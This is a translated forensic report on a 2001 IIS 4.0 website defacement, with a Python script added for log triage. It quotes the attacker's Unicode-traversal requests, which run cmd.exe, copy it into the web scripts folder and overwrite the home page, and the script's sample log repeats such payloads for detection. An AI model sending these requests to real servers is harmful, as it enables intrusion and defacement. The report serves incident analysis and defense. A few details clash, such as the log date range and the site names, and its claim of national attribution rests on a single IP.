Author: Zhu Xiaoying
I am a security engineer at our company. Recently, American hackers launched a fierce attack on my country's government websites, and our company's security emergency response center has received 7 or 8 such cases.
From our analysis of the intrusion process in these cases, we found that the American hackers did not use very sophisticated means; most of them exploited common weaknesses, picked small websites to attack, and used a few well-known security vulnerabilities. The vulnerability in the following example is common on many websites in my country. I hope your network will publicize intrusion cases like this through the Internet media, so that everyone is alerted and takes practical protective measures. I hope the Internet media will not only report enthusiastically on the attacks, but also put some focus on security protection, so that the coverage has both news value and helps readers. Thank you!
Intrusion analysis of www.xxxx.xxx.cn
One: Event background
The website of the Guangdong C office, www.xxx.com.cn (IP: 61.xxx.xxx.17), was maliciously attacked by a hacker during April 2001, resulting in a web page of the site being modified. Shenzhen An Lu Technology Co., Ltd. was commissioned by a city S board on April 17, 2001 to go to the computer room for on-site forensics.
Two: Basic situation of the server and information obtained
The server operating system is Windows NT Server 4.0 with IIS 4.0 installed; it sits behind a firewall that only allows the Web service through. Our technicians collected the MS IIS 4.0 HTTPLOG and FTPLOG from April 13 to April 17, 2001.
Three: Analysis
Since the site's web page was modified after the intrusion, and the site is protected by a PIX firewall with only port 80 open, our preliminary estimate was that the intruder gained control of the system through an IIS remote vulnerability: IIS 4.0 ships by default with the ISM.DLL, msadcs.dll, Unicode and other remote vulnerabilities that give permission to modify web pages. Our company's technical staff therefore carried out a detailed analysis and filtering of the server's MS IIS 4.0 logs from August 17 to April 17, 2001, and drew the following conclusion:
The intruder used the Unicode vulnerability, which allows a request submitted over the Web port to execute a command, to modify the website's home page.
Note: For details, please see: http://www.cnns.net/article/db/822.htm
The modified page is as follows:
The following is the intruder's intrusion record. The columns are:
1: intruder IP, 2: date, 3: time, 4: request method, 5: requested URL, 6: server return code
If the server returned 200, the intruder successfully executed the command using the Unicode vulnerability.
152.158.208.65 01-4-17 4:34:19 get /scripts/..鼆€€€€?./winnt/system32/cmd.exe, /c dir c: 500
152.158.208.65 01-4-17 4:34:19 get /scripts/..?../winnt/system32/cmd.exe, /c dir c: 500
152.158.208.65 01-4-17 4:34:19 get /scripts/../../winnt/system32/cmd.exe, /c dir c: 200
152.158.208.65 01-4-17 4:34:19 get /_vti_bin/../../..../..../../winnt/system32/cmd.exe, /c dir c: 200
152.158.208.65 01-4-17 4:34:19 get /scripts/.../winnt/system32/cmd.exe, /c dir c: 200
152.158.208.65 01-4-17 4:34:21 get /scripts/.../winnt/system32/cmd.exe, /c dir c: 200
152.158.208.65 01-4-17 4:34:21 get /scripts/../../winnt/system32/cmd.exe, /c dir c: 200
152.158.208.65 01-4-17 4:34:21 get /scripts/../../winnt/system32/cmd.exe, /c dir c: 200
152.158.208.65 01-4-17 4:34:21 get /_vti_bin/../winnt/system32/cmd.exe, /c dir c: 200
152.158.208.65 01-4-17 4:34:23 get /scripts/.../winnt/system32/cmd.exe, /c dir c: 200
152.158.208.65 01-4-17 4:34:23 get /scripts/../../winnt/system32/cmd.exe, /c dir c: 200
152.158.208.65 01-4-17 4:34:23 get /scripts/..饊€?/winnt/system32/cmd.exe, /c dir c: 500
152.158.208.65 01-4-17 4:34:23 get /msadc/../../..../../../winnt/system32/cmd.exe, /c dir c: 200
152.158.208.65 01-4-17 4:34:25 get /scripts/..o../winnt/system32/cmd.exe, /c dir c: 404
152.158.208.65 01-4-17 4:34:25 get /scripts/..?../..........MSSQL7/INSTALL/PubText.bat" & dir c: 403
152.158.208.65 01-4-17 4:34:25 get /scripts/..鴢€€?./winnt/system32/cmd.exe, /c dir c: 500
152.158.208.65 01-4-17 4:34:25 get /鄝?/winnt/system32/cmd.exe, /c dir c: 404
152.158.208.65 01-4-17 5:21:17 get /scripts/.../winnt/system32/cmd.exe, /c set 502
152.158.208.65 01-4-17 5:21:37 get /scripts/.../winnt/system32/cmd.exe, /c copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\1.exe 502
152.158.208.65 01-4-17 5:24:32 get /scripts/..../inetpub/scripts/1.exe, /c dir c: 200
152.158.208.65 01-4-17 5:24:38 get /scripts/..../inetpub/scripts/1.exe, /c set 502
152.158.208.65 01-4-17 5:24:49 get /scripts/..../inetpub/scripts/1.exe, /c dir c:\inetpub\wwwroot\fastinfo 200
152.158.208.65 01-4-17 5:25:10 get /scripts/.../inetpub/scripts/1.exe, /c echo rty > c:\inetpub\wwwroot\fastinfo\Index.asp 502
152.158.208.65 01-4-17 5:25:19 get /index.asp 200
152.158.208.65 01-4-17 5:25:37 get /scripts/..../inetpub/scripts/1.exe, /c echo ^^join us: poizonb0x@linuxmail.org ^^^^^^^^^^^^^^^^^^ ^^ ^^^ Pix, ^^^> c:\inetpub\wwwroot\fastinfo\INDEX.ASP 502
152.158.208.65 01-4-17 5:25:43 get /index.asp 200
From the above analysis we can clearly see that on April 17, 2001 the intruder, working from a single IP address, repeatedly tried to use the Unicode vulnerability to execute commands remotely in order to modify the web page.
Attack time: April 17, 2001 4:34:19 to April 17, 2001 5:25:43
Intruder IP address: 152.158.208.65, from the United States
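The analysis above is essentially a log-filtering exercise: pick out requests that traverse out of the script directory to reach cmd.exe (or a copy of it), treat a 200 return as a command that ran, and read the source IP and the first and last timestamps off the surviving hits. The script below is an added example of that triage, not part of the original report or the company's tooling. It parses constructed log lines in the report's six-column layout (with the URI query as its own column, as IIS W3C logs keep it) and reports the same facts the report's conclusion states. The %c0%af sequence in the sample is the well-known overlong encoding of "/" that the vulnerable IIS decoded only after its directory check; the report's own excerpt shows such bytes already decoded, which is why they appear as mojibake there. Field names, rule names and the sample lines are this example's own assumptions.

```python
import re
from dataclasses import dataclass, field
from datetime import datetime
from typing import Optional
from urllib.parse import unquote_to_bytes

# Six-column layout: IP, date, time, method, URI stem, URI query ("-" if none), status.
LINE_RE = re.compile(
    r"^(?P<ip>\S+)\s+(?P<date>\S+)\s+(?P<time>\S+)\s+(?P<method>\S+)\s+"
    r"(?P<stem>\S+)\s+(?P<query>\S+)\s+(?P<status>\d{3})$"
)

# Constructed sample log (not the report's real records); '+' stands for a space
# in the query column, as in IIS logs.
SAMPLE_LOG = r"""
152.158.208.65 01-4-17 4:34:19 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c: 500
152.158.208.65 01-4-17 4:34:19 GET /scripts/../../winnt/system32/cmd.exe /c+dir+c: 200
152.158.208.65 01-4-17 5:21:37 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\1.exe 502
152.158.208.65 01-4-17 5:24:32 GET /scripts/..%c0%af../inetpub/scripts/1.exe /c+dir+c: 200
152.158.208.65 01-4-17 5:25:43 GET /index.asp - 200
10.1.2.3 01-4-17 9:00:00 GET /default.htm - 200
"""


@dataclass
class Event:
    ip: str
    ts: datetime
    stem: str
    query: str
    status: int
    reasons: list = field(default_factory=list)


def decode_stem(stem: str) -> tuple:
    """Percent-decode the URI stem once. Returns the path (latin-1, so every byte
    stays visible) and whether any byte >= 0x80 survived, which is the footprint
    of an overlong/UTF-8 traversal sequence."""
    raw = unquote_to_bytes(stem)
    return raw.decode("latin-1"), any(b >= 0x80 for b in raw)


def find_reasons(stem: str, query: str) -> list:
    """Return the detection rules (assumed names) that a request trips."""
    path, non_ascii = decode_stem(stem)
    path = path.lower().replace("\\", "/")
    reasons = []
    if ".." in path:
        reasons.append("traversal")
    if non_ascii:
        reasons.append("overlong-encoding")
    if path.endswith("/cmd.exe"):
        reasons.append("cmd.exe")
    elif path.endswith(".exe") and path.startswith(("/scripts/", "/msadc/", "/_vti_bin/")):
        # Covers the renamed copy of cmd.exe (1.exe) seen in the report.
        reasons.append("exe-in-script-dir")
    q = query.lower()
    if q == "/c" or q.startswith("/c+"):
        reasons.append("shell-argument")
    return reasons


def parse_line(line: str) -> Optional[Event]:
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(f"{m['date']} {m['time']}", "%y-%m-%d %H:%M:%S")
    ev = Event(m["ip"], ts, m["stem"], m["query"], int(m["status"]))
    ev.reasons = find_reasons(ev.stem, ev.query)
    return ev


def summarize(log_text: str) -> dict:
    """Condense flagged requests into the facts an incident report states."""
    events = [e for e in map(parse_line, log_text.splitlines()) if e]
    hits = [e for e in events if e.reasons]
    if not hits:
        return {"source_ips": [], "executed": 0, "attempted": 0,
                "first_seen": None, "last_seen": None, "commands": []}
    fmt = "%Y-%m-%d %H:%M:%S"
    return {
        "source_ips": sorted({e.ip for e in hits}),
        # The report treats 200 as proof the command ran; its excerpt also shows a
        # 502 "copy" followed by successful use of the copied file, so non-200 hits
        # are counted as attempts rather than dismissed as failures.
        "executed": sum(1 for e in hits if e.status == 200),
        "attempted": sum(1 for e in hits if e.status != 200),
        "first_seen": min(e.ts for e in hits).strftime(fmt),
        "last_seen": max(e.ts for e in hits).strftime(fmt),
        "commands": sorted({e.query.replace("+", " ") for e in hits
                            if "shell-argument" in e.reasons}),
    }


if __name__ == "__main__":
    for k, v in summarize(SAMPLE_LOG).items():
        print(f"{k}: {v}")
```

The 500 responses in the report's excerpt, where a malformed encoding was rejected before anything ran, still trip the traversal and overlong-encoding rules here, which is the point: a burst of such errors from one address is the earliest visible sign of this probing, before the first 200 appears.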
Four: Conclusion
The intruder used the IIS Unicode remote vulnerability to gain control of the system, executed commands remotely several times, and, after learning the server's directory structure, modified the home page.
Identified IP: 152.158.208.65, from the United States
Attack time: April 17, 2001 4:34:19 to April 17, 2001 5:25:43
The intruder's physical location is the United States.